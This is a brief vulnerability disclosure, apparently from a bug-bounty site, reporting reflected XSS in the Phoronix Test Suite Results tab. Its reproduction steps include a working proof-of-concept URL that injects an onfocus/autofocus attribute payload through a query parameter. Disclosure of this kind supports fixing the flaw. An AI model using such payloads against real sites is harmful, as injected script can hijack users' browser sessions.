Reflected XSS in Results tab in phoronix-test-suite/phoronix-test-suite
Jun 8th 2022
Please enter a description of the vulnerability.
Proof of Concept
1. Install a local instance of phoronix 2. Run a benchmark 3. When the test is complete, for example the result id is xxxxx 4. Acess http://localhost/?result/xxxxx&ppd_U1lTVEVN=abc"onfocus="alert(origin)"+autofocus="abc&oss=&submit=Refresh+Results You will see alert box
This vulnerability is capable of Reflected XSS